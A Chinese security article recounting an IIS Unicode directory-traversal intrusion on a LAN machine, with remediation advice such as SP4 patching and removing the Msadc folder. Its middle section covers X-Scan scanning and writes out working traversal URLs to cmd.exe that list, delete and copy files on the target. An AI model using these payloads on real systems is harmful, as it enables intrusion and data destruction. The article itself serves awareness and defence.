服务器安全：堵上致命的IISUnicode

　　是我自己不注意的时候创建的吗?随即我漫不经心地打开了这个文本文件。上面赫然写着几个字:你的电脑有漏洞，我随时都可以删除你的文件!不相信就看看你XXX目录下的那个文件，他已经被我移动到了XXX目录里!。是吗?我遭黑客攻击了。好在他还处于黑客的初级阶段，我知道他是如何入侵我的计算机的。

　　扫描漏洞的软件

　　他可能采用了扫描漏洞的黑客软件如:X-Scan V2.3、小榕的“流光”等，以X-Scan V2.3为例，该软件采用多线程方式对指定IP地址段进行安全漏洞检测，并提供了图形界面和命令行两种操作方式，扫描内容包括:远程操作系统类型及版本，标准端口状态及端口BANNER信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息等。扫描结果会保存在/log/目录中，index_*.htm为扫描结果索引文件。下载完成后，点击压缩包中“xscan_gui.exe”进入X-Scan图形界面。

　　设置扫描参数

　　他点击工具栏的第二个按钮进入“扫描参数”对话框(图1)，在“指定IP范围”栏中输入局域网IP地址范围是“192.168.0.1-192.168.0.99”。其它可以使用默认。

                                                                              图1

　开始扫描

　　他点击工具栏的第三个按钮进行漏洞扫描。检测出IP地址为“192.168.0.15”，我的计算机有许多明显的IISUnicode漏洞。想知道IISUnicode漏洞是什么吗?我简单介绍一下IISUnicode漏洞:微软的IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“\”从而利用“../”目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename账号进行入侵。该账号在默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑驱动器上并能被这些用户组访问的文件都能被删除、修改或执行，就如同一个用户成功登陆后所能完成的一样。

入侵我的计算机

　　他可能出于好奇，在IE浏览器的地址栏中输入“http://192.168.0.15/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\”，立刻显示出了我计算机(IP地址为“192.168.0.15”)的C盘所有的文件和目录(图3)，太刺激了!他又将“c:\”换成“d:\”、“e:\”,都能成功地显示各盘符下所有文件和目录，他心中开始涌动着要当“黑客”的念头。他想删除我计算机上的文件?试着输入“http://192.168.0.15/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+del+c:\aa.txt”,果然刷新一下图2命令，文件没了。想复制文件并改名，他输入“http://192.168.0.15/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+copy+c:\aa.fon c:\unzipped\bad.fon”,如图3所示换名复制成功。

图2

图3

　　他还想显示某一路径下相同文件类型的文件内容，输入“http://192.168.0.15/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+d:\*.xls”列出了D盘根目录下所有的excel文件(图4)。哈哈，他已完全控制了我的计算机，想干什么就干什么。能给我个提示，就算不错了。

图4

　　通过这个真实事例，我们可以看到，IISUNICODE漏洞虽然出现了很久了，但是很多象我一样大意的用户根本没有取消IIS服务和打上补丁的安全防范意识，其实防范IISUnicode漏洞最简单的方法就是限制网络用户访问和调用CMD的权限，在Scripts、Msadc目录没必要使用的情况下，尽量删除这些文件夹或者干脆换名。安装NT系统时尽量不要使用默认的win nt路径，改成自己喜欢的名字。再则还可以安装上SP4补丁程序，很多漏洞就会不复存在了。此外平时还要勤于升级，如果觉得每天上网去打补丁太麻烦的话，可以将WINDOWS Updata设定为自动，那么系统一但连上互联网后就会自动查找最新补丁，你要做的就仅仅是确定安装而已，非常方便。“亡羊补牢，为未晚已”，IISUnicode漏洞今天您堵上了吗?